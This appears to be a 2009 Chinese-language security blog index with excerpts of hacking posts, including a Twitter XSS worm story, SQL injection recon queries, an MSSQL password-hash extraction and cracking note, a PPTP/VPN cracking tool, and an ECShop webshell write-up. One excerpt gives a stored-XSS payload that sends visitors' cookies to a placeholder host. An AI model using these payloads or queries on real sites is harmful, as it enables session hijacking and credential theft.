17歲少年:twitter XSS worm「stalkdaily worm」蠕蟲是我做的

2009/04/16 16:33 | 鬼仔 | 技术文章 | 2 条评论了已经

# 鬼仔:简体中文版请看这里

来源:阿碼外傳

昨天晚上開始,twitter上以驚人的速度,不斷有人抱怨被「我被StalkDaily蠕蟲攻擊了!」Twitter很紅的介面之一TweetVisor也在畫面左邊顯示警告:
阅读全文 »

Tags: , , , , ,

實際演練說明,你的路徑安全嗎?CERT: 攔截式代理伺服器有漏洞、SANS:小心你的路由器!

2009/04/16 16:11 | 鬼仔 | 技术文章 | 3 条评论了已经

# 鬼仔:简体中文版请看这里

来源:阿碼外傳

(本文中你將看到實際的演練,在真實的網路上,我們會示範如何藉由攔截式代理伺服器的漏洞,取得路由器與其他內網伺服器的管理介面與登入prompt。測試點不在台灣。)

這 篇之中我們繼續討論路徑上之安全性,但開始之前,我們先做一下聲名。本文章宗旨在於探討在現今複雜之網路架構中之路徑安全性,內容與任何資安事件皆無關連 性。三月初於台灣發生的大規模轉址事件,目前相關各單位與我們的結論大致一樣,我們的研究正確,TTL=7以下為攻擊發生點,但是TTL=7這台路由器並 非屬於國內任何一家ISP所有。我們的研究一樣沒有指出責任歸屬,我們說過我們有興趣的是技術面。但是大家看到我們公佈的IP可能就開始猜測是哪家 ISP。攻擊者位於路徑border沒有錯(就是不同ISP交會處),而在border上的路由器一般都有多個介面,各對應不同ISP所給的IP,我們從 台灣trace,看到的介面IP會屬國內ISP沒有錯,但是並不表示此台路由器就歸國內ISP所管。事實上如果各位看我們當初traceroute畫面上 的時間差就可以發現,TTL=7應該已經出台灣了,事後經過求證也如此。所以如果把矛頭轉向國內ISP並不正確。另外也不表示是路由器出問題,只確定是 TTL=7那台路由器以下都有可能,但是絕不像其他專家所說,是ARP掛馬以及發生點位於網站端。當然我們也得知了,出問題之設備為網路設備但是非路由 器,至於究竟是那個廠牌的什麼設備,這邊就不繼續討論了。我們的研究價值,主要不在於探討究竟是國內還是國外的ISP出問題,還是哪一家設備商的產品出問 題,我們是在探討,究竟威脅存在於哪裡?駭客可以使用哪些技術?
阅读全文 »

Tags: ,

利用注射点判断数据库web是否分离

2009/04/14 12:52 | 鬼仔 | 技术文章 | 5 条评论了已经

作者:kook1991

得到客户端主机名:
select host_name();

得到服务端主机名:
select @@servername;

结果一样就极有可能未分离,结果不一样就是分离的

Tags: , , ,

校内网一个跨站漏洞的利用

2009/04/13 13:20 | 鬼仔 | 技术文章 | 15 条评论了已经

作者:Flyh4t

校内网在发blog时对插入图片过滤不严格,存在xss漏洞

在发blog时将插入图片URL写为如下代码即可触发:

javascript:window.location.href='http://xxxxx/test.php?cookie='+document.cookie

test.php的作用是窃取cookie、伪造阅览者身份发一个blog、跳转到一个正常的日志,代码如下:
阅读全文 »

Tags: , , ,

pptp & vpn 破解工具

2009/04/07 22:59 | 鬼仔 | 工具收集 | 6 条评论了已经

作者:x90x20

有需求,网上找不到相关工具,所以自己写了个.没有提供给用户自行定义线程数量的接口.本程序不直接读取IO文件中的密码,而是将每个要用到的密码 文件映射到内存操作,所以同时最大只支持32个线程,密码文件不宜过大,从性能上来说越小越好,以免过多的造成内存碎片,降低机器的性能.很抱歉,因为写 它的时候我并没有打算去写个内存池来优化它的内存操作.我仅仅是做个测试而已,没有考虑会利用它来做些什么.
阅读全文 »

Tags: , ,

Database Password Hashes Cracking

2009/04/07 22:21 | 鬼仔 | 技术文章 | 才 1 条评论

信息来源:WEB安全手册
作者:sid

SQL Server 2000:-
SELECT password from master.dbo.sysxlogins where name=’sa’
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A

0×0100- constant header
34767D5C- salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
阅读全文 »

Tags: , , ,

ECShop网店系统< =V2.6.2 后台拿webshell

2009/04/07 21:56 | 鬼仔 | 技术文章 | 11 条评论了已经

作者:oldjun

ECSHOP是一款开源免费的网上商店系统。由专业的开发团队升级维护,为您提供及时高效的技术支持,您还可以根据自己的商务特征对ECSHOP进行定制,增加自己商城的特色功能。(官方介绍)

ECSHOP前段时间出了个注射漏洞:http://bbs.wolvez.org/topic/67/,拿后台权限应该没有问题,但文章没有提及如何在后台拿shell。昨天可乐在t00ls.Net上发帖问如何拿shell,无聊中我baidu、 google了下,网上貌似没有拿shell的办法。好久没读代码了,无聊中下了ECSHOP最新版(V2.6.2)的源码过来读,很庆幸,给我找到一个可以直接写shell的文件。与注射一样,同样是个变化未初始化导致的问题,于是,同样只能用在register_globals为on的环境下。
阅读全文 »

Tags: , ,

本站添加了CDN,请大家帮忙测试

2009/04/07 16:13 | 鬼仔 | 心情随笔 | 101 条评论了已经

# 鬼仔:目前CDN已经去掉了,现在已经没有CDN了,但是速度依然不慢。其实很早就已经去掉CDN了,但是看到好多同学还以为我现在是加着CDN的,就更新说明下。

昨天添加了CDN,现在各地的DNS应该都生效了。

请大家帮忙测试下,感觉速度跟以前相比是快了还是慢了?

另外请 ping 下 huaidan.org ,然后把结果贴在评论里,同时请告知你的地区及网络类型,谢谢了!或者您有其他的建议,也可以在这里告诉我。

我这里速度是比较快了,没有加CDN之前,我这里ping值是240左右,加了CDN之后,ping值在30左右,我们这边的这个节点速度还不错,但是不知道其他地区的节点速度怎么样,所以请大家帮忙测试。

我用的是 CDN联盟 的CDN服务,感谢 amxku 提供。

Tags: